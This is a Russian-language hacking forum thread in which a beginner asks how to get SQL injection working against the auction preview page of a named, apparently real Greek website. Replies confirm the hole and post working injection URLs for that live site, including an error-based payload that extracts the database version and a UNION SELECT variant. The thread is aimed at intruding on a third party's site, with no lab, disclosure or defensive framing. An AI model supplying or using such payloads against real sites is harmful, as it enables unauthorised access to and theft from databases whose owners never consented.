|
На одном сайте не могу внедрить SQL-инъекцию, пишу "-" или "." перед значением id=, не пускает ошибка Error 404 - page not found и все. Посоветуйте чего, а то я новичок в этом деле...
Так не пускет: Код:
http://www.texnitesonline.gr/controller/auction/preview.php?id=-18961' union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 -- - |
Здесь нет sql иньекции
|
Цитата:
div 0 union select |
Инъекция есть, не пугайтесь редиректов и ошибок.
|
Код:
http://www.texnitesonline.gr/controller/auction/preview.php?id=18961' AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(version(),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '1'='1 |
Цитата:
|
Ну и если кому-то по эстетическим причинам не нравится error based, то так оно тоже вполне себе работает
Код:
http://www.texnitesonline.gr/controller/auction/preview.php?id=18963' limit 0 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,version(),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 -- 1 |
| Время: 08:56 |